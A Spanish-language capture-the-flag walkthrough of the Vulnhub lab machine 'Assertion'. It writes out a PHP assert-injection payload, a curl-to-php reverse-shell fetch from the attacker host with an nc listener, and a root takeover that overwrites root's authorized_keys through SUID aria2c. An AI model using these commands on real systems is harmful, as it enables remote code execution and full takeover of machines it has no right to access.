[VLN] Assertion

Hoy vamos a hackear la maquina de Vulnhub llamada Assertion. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/assertion-101,495/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- 192.168.112.139 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 23:14 CEST Nmap scan report for 192.168.112.139 Host is up (0.0030s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6e:ce:aa:cc:02:de:a5:a3:58:5d:da:2b:ef:54:07:f9 (RSA) | 256 9d:3f:df:16:7a:e1:59:58:84:4a:e3:29:8f:44:87:8d (ECDSA) |_ 256 87:b5:6f:f8:21:81:d3:3b:43:d0:40:81:c0:e3:69:89 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Assertion Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.05 seconds
    Tras explorar la pagina web, vemos que "index.php?page=" tiene un LFI un tanto especial debido a la funcion assert.
    http://192.168.112.139/index.php?page=' and die(system('id')) or '
    Sabiendo que podemos ejecutar comandos en la victima, vamos a preparar una php-reverse-shell.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php . sml@m0nique:~$ mv php-reverse-shell.php rshell.php sml@m0nique:~$ nano rshell.php #MODIFICAMOS_IP/PUERTO
    Ponemos nc a la escucha:
    sml@m0nique:~$ nc -nlvp 1234 listening on [any] 1234 ...
    Y por ultimo navegamos a...
    http://192.168.112.139/index.php?page=' and die(system("curl http://192.168.112.128/rshell.php|php")) or '
  • Low Shell
  • Y ya estamos dentro :)
    sml@m0nique:~$ nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.112.128] from (UNKNOWN) [192.168.112.139] 35662 Linux assertion 4.15.0-74-generic #84-Ubuntu SMP Thu Dec 19 08:06:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 20:11:10 up 2:03, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
    Buscamos a ver si encontramos algo con permisos SUID.
    $ find / -perm -4000 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/bin/at /usr/bin/aria2c /usr/bin/newgrp /usr/bin/newgidmap /usr/bin/newuidmap /usr/bin/passwd /usr/bin/pkexec /usr/bin/sudo /usr/bin/chsh /usr/bin/traceroute6.iputils /usr/bin/gpasswd ---SNIP--- $
  • Privilege Escalation
  • Encontramos el programa aria2c, el cual podemos utilizar para descargarnos un fichero y sobrescribir el original como root. Prepararemos un authorized_keys con nuestra llave publica, y luego dicho fichero lo guardaremos en /root/.ssh/authorized_keys, usando aria2c sobrescribiremos el original y podremos loguearnos como root por ssh sin password! Preparamos el authorized_keys.
    sml@m0nique:~$ cat ~/.ssh/id_rsa.pub >> /var/www/html/authorized_keys
    Usando aria2c, lo copiamos donde queremos :)
    www-data@assertion:/$ /usr/bin/aria2c -d /root/.ssh/ -o authorized_keys "http://192.168.112.128/authorized_keys" --allow-overwrite=true 07/06 20:57:32 [NOTICE] Downloading 1 item(s) 07/06 20:57:32 [NOTICE] Download complete: /root/.ssh//authorized_keys Download Results: gid |stat|avg speed |path/URI ======+====+===========+======================================================= d0ed13|OK | 551KiB/s|/root/.ssh//authorized_keys Status Legend: (OK):download completed.
    Y probamos!
    sml@m0nique:/var/www/html$ ssh root@192.168.112.139 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Jul 6 20:57:40 UTC 2020 System load: 0.01 Processes: 197 Usage of /: 34.1% of 19.56GB Users logged in: 0 Memory usage: 14% IP address for ens33: 192.168.112.139 Swap usage: 0% => There is 1 zombie process. * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 76 packages can be updated. 0 updates are security updates. Last login: Thu Jan 16 10:38:39 2020 root@assertion:~#
  • root.txt
  • root@assertion:~# ls root.txt root@assertion:~# cat root.txt 8efabdae07730bdcb14d83e37a2e7398
  • End
  • Y con esto ya seriamos root de la maquina :)